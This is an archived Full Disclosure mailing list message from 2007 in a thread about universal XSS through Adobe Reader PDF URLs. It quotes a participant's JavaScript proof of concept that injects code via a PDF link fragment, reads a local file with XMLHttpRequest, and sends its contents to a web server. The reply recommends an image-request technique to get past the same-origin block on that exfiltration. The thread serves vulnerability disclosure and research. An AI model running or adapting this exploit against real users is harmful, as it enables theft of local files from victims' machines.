Full Disclosure mailing list archives
Re: Universal XSS with PDF files: highly dangerous
From: "pdp (architect)" <pdp.gnucitizen () googlemail com>
Date: Thu, 4 Jan 2007 21:22:08 +0000
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images. var img = new Image() img.src = url; this should work. On 1/4/07, T Biehn <tbiehn () gmail com> wrote:
I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability: Here's the code I have so far, based more or less on PDP's Vanilla, almost' PDP's (different url, spaces removed etc.) file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); What I'm trying to do: file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', ' file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context. Try putting this is IE: file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol') ; and then try it in FireFox It won't work in IE 6, but it executes just fine in FireFox. function cXHR(){ //Grabs a legit XHR. try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } var xhr = cXHR(); //For grabbing var xhr2 = cXHR(); //For sending xhr.onreadystatechange = function(){ if (xhr.readyState == 4){ alert(xhr.responseText); xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo. xhr2.onreadystatechage = function(){ alert('File Transferred!'); }; xhr2.send (null); } }; xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true); xhr.send(null); Anyone's input on this matter would be appreciated. On 1/4/07, Juha-Matti Laurio <juha-matti.laurio () netti fi> wrote:Additionally, the public PoC doesn't work on Preview version 3.0.8 (409)on OS X 10.4.8.- Juha-Matti Larry Seltzer <Larry () larryseltzer com> wrote:"According to public reports, this vulnerability is addressed in AdobeAcrobat Reader 8.0." I've actually tested it. On Reader 8 Acrobat you get a messagebox that says "This operation is not allowed" Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer () ziffdavis com_______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
-- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Universal XSS with PDF files: highly dangerous, (continued)
- Re: Universal XSS with PDF files: highly dangerous Kristina Lein (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous Stefano Di Paola (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous The Anarcat (Jan 08)
- Re: Universal XSS with PDF files: highly dangerous Matthew Flaschen (Jan 08)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Larry Seltzer (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous T Biehn (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous T Biehn (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Kristina Lein (Jan 05)